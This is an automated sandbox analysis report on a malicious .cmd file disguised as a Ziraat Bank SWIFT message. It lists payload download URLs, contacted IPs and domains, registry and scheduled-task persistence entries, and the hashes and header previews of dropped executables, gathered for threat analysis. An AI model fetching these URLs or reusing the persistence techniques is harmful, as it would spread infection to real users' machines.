                                                                                                                                                                                                                                                                                                                                                                                                  http://18.141.10.107/5alg.exe, 0000001D.00000003.2825140838.000000000055D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                    http://35.164.78.200/uahjpntrialg.exe, 0000001D.00000003.2076659041.000000000057C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                      http://44.221.84.105/alg.exe, 0000001D.00000003.2554188081.00000000005A7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2825140838.000000000055D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                        http://54.244.188.177/gcjwtnopNative_neworigin.exe, 0000001B.00000003.1551625098.000000000522A000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000003.1552020145.0000000005247000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                          http://18.141.10.107/wpvwjnrkggb440alg.exe, 0000001D.00000003.2825140838.000000000055D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                            https://api.ipify.org/tNative_neworigin.exe, 0000001B.00000002.1722177417.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                              http://18.141.10.107:80/avkhmehufiialg.exe, 0000001D.00000003.2476312068.0000000000574000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                http://www.pmail.comAnyDesk.PIF, AnyDesk.PIF, 0000000F.00000002.1459416504.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020BA2000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311999021.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1543463102.0000000021AA0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1575416317.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1432008197.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1457046440.0000000002C53000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020AD0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311674784.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1544663753.0000000021CA2000.00000004.00001000.00020000.00000000.sdmp, aymtmquJ.pif, 00000019.00000000.1432545418.0000000000416000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                  http://44.221.84.105/phrsxgalg.exe, 0000001D.00000003.2054334789.000000000057C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                    http://34.246.200.160/rfcbglebjalg.exe, 0000001D.00000003.2764898749.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2774103854.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2825140838.000000000055D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                        http://172.234.222.143/)Native_neworigin.exe, 0000001B.00000003.1551625098.000000000522A000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000003.1552020145.0000000005247000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                          http://54.244.188.177/gcjwtnoNative_neworigin.exe, 0000001B.00000003.1551625098.000000000522A000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000003.1552020145.0000000005247000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000068E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                            http://x1.c.lencr.org/0Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003218000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1778079726.000000000522C000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1778079726.0000000005282000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000063E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000068E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                              http://x1.i.lencr.org/0Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003218000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1778079726.000000000522C000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1778079726.0000000005282000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000063E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000068E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                http://44.221.84.105:80/ryyevidfyalg.exe, 0000001D.00000003.2801483530.0000000000574000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                  https://enterpriseregistration.windows.net/EnrollmentServer/device/kn.exefalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    https://gxe0.com/AnyDesk.PIF, 0000000F.00000002.1438483669.0000000000797000.00000004.00000020.00020000.00000000.sdmptrue

                                                                                                                                                                                                                                                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                                                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                                                                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                                                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                                                                                                                                                                      165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                                      		myups.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                      		19574CSCUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                      3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      		uaafd.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                      		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                      3.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      		ytctnunms.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                      		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                      34.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      		tbjrpv.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                      		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                      198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      		gxe0.comCanada
                                                                                                                                                                                                                                                                                                                                                                                                                                      		20068HAWKHOSTCAtrue
                                                                                                                                                                                                                                                                                                                                                                                                                                      172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      		przvgke.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                      		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                      18.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      		kcyvxytog.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                      		14618AMAZON-AESUStrue
                                                                                                                                                                                                                                                                                                                                                                                                                                      34.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      		apzzls.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                      		16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                                                                                                                                                      208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      		yunalwv.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                      		32748STEADFASTUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                      35.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      		sctmku.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                      		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                      172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                      		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                      51.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      		s82.gocheapweb.comFrance
                                                                                                                                                                                                                                                                                                                                                                                                                                      		16276OVHFRfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                      72.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      		wxgzshna.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                      		32244LIQUIDWEBUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                      44.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      		bumxkqgxu.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                      		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                      85.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                      		dlynankz.bizGermany
                                                                                                                                                                                                                                                                                                                                                                                                                                      		6724STRATOSTRATOAGDEfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                      54.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      		nlscndwp.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                      		16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                                                                                                                                                      13.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      		xnxvnn.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                      		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                      47.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      		qncdaagct.bizCanada
                                                                                                                                                                                                                                                                                                                                                                                                                                      		34533ESAMARA-ASRUfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                      18.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      		ereplfx.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                      		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                      104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                      		api.ipify.orgUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                      82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      		vjaxhpbji.bizRussian Federation
                                                                                                                                                                                                                                                                                                                                                                                                                                      		43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                      18.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      		ssbzmoy.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                      		16509AMAZON-02USfalse

                                                                                                                                                                                                                                                                                                                                                                                                                                      General Information

                                                                                                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                                                                                                                                                                      Analysis ID:1557469
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date and time:2024-11-18 09:56:14 +01:00
                                                                                                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                                                                                                                                                                      Overall analysis duration:0h 15m 37s
                                                                                                                                                                                                                                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                                                                                                                                                                      Number of analysed new started processes analysed:45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Number of new started drivers analysed:3
                                                                                                                                                                                                                                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                                                                                                                                                                      Sample name:Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd
                                                                                                                                                                                                                                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                                                                                                                                                                                                                                      Classification:mal100.spre.bank.troj.spyw.evad.winCMD@61/169@305/22
                                                                                                                                                                                                                                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Number of executed functions: 60
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Number of non-executed functions: 209
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Found application associated with file extension: .cmd
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                                                                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                                                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, SIHClient.exe, Sgrmuserer.exe, svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                                                                                                                                      • VT rate limit hit for: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd

                                                                                                                                                                                                                                                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                                                                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                                                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                                                                                                                                                                                                                                      03:57:13API Interceptor2x Sleep call for process: AnyDesk.PIF modified
                                                                                                                                                                                                                                                                                                                                                                                                                                      03:57:28API Interceptor126x Sleep call for process: Native_neworigin.exe modified
                                                                                                                                                                                                                                                                                                                                                                                                                                      03:57:31API Interceptor150x Sleep call for process: alg.exe modified
                                                                                                                                                                                                                                                                                                                                                                                                                                      03:57:31API Interceptor25x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                                                                                                                                                                                                                      03:57:41API Interceptor2x Sleep call for process: Juqmtmya.PIF modified
                                                                                                                                                                                                                                                                                                                                                                                                                                      03:57:42API Interceptor12x Sleep call for process: aymtmquJ.pif modified
                                                                                                                                                                                                                                                                                                                                                                                                                                      09:57:30Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      09:57:30AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Juqmtmya C:\Users\Public\Juqmtmya.url
                                                                                                                                                                                                                                                                                                                                                                                                                                      09:57:39AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Juqmtmya C:\Users\Public\Juqmtmya.url
                                                                                                                                                                                                                                                                                                                                                                                                                                      09:57:48AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

                                                                                                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                                                                                                                                                                                                                                                      IPs

                                                                                                                                                                                                                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\AutoIt3\Au3Check.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1353216
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.324381225777409
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:EC4VQjGARQNhiaXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:EOCAR0iasqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:8B7E968F4FA1CCECFCFA77ADFD9BE327
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:A8BF070D26965CE498B3D75DDB473BEE04C75A35
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:6CED0EA7DC864AF34707B2A72D68F85C4D0DF9199F13E081968E913BA8A0EC28
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:3DAAAA86468F3B73A033963520A1F6EC0F3283A3711F19069D8AE4440688B2A16339AD5DD87C2DFA0FEB9CF6E4B34368DC5D7D4CC0FF6A2FD84F845DA19139FF
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@...........................!.....m$......................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....P...p...@...f..............@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\AutoIt3\Au3Info.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1294848
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.282701081652174
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:fNUpaKghhXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:fCMKgTsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:8EDB9C650574E2608871AF5CADA014B8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:382A56CF060B51CBED87EDF1A0CC1739FF1943C7
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:C5A4865966BEBD9C0B471060F210BA05FD23322DBC62EA9C5DD05606F078D269
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:B5E380843116367BEC236D94A8B4CDF6F8A6ABFD9B9BA41C21D3AAD9C58AB85ECCA5561E0B04802F77E2F181209D9B9FFFB896B14323E0A3CA756CE5C05BB436
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@........................... .............................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...`...`...P...r..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1314304
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.274138199388269
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:hMEhwdbTWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:fKdHWsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:39EB775582A1C452482D310C0E5A263E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:1BB3F269F6E57F1BE11792E846D0FF5FA4E3040F
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:5085FC2C0149884244106B48074F9D7BF774F76646DFCEC56C064BC57C6806BA
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:A29BD8010D5F7A6F765B177187F868F1130372DF132F385F88649F110D0B3BC9841D626D5EB2259ED4B09D3AF76C6B7C232BDE8CCED801909D13634B427EE269
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@............................. !.....E..... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2203136
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.647033100106745
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:+K0eqkSR7Xgo4TiRPnLWvJSDmg27RnWGj:+K0pR7Xn4TiRCvJSD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:C450C0825B80F66BBC1D2BBB03CA06EE
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:C57709F40592718A6A9810C9D768AEB1CD934480
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:ACBE3DEEC4534614BA46D83600590849283B223F93C8FAA63B0FB0BE6F9EC6B2
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:2A4952F32743A56381024F0E22D38B06A1FC6EE9C061032EF48976945F866AD6C7DB0E35965F245375572CC3B3CD3FA21E49E27C8F59FBABCAF527B8C9DE4F80
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@...........................".......!..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

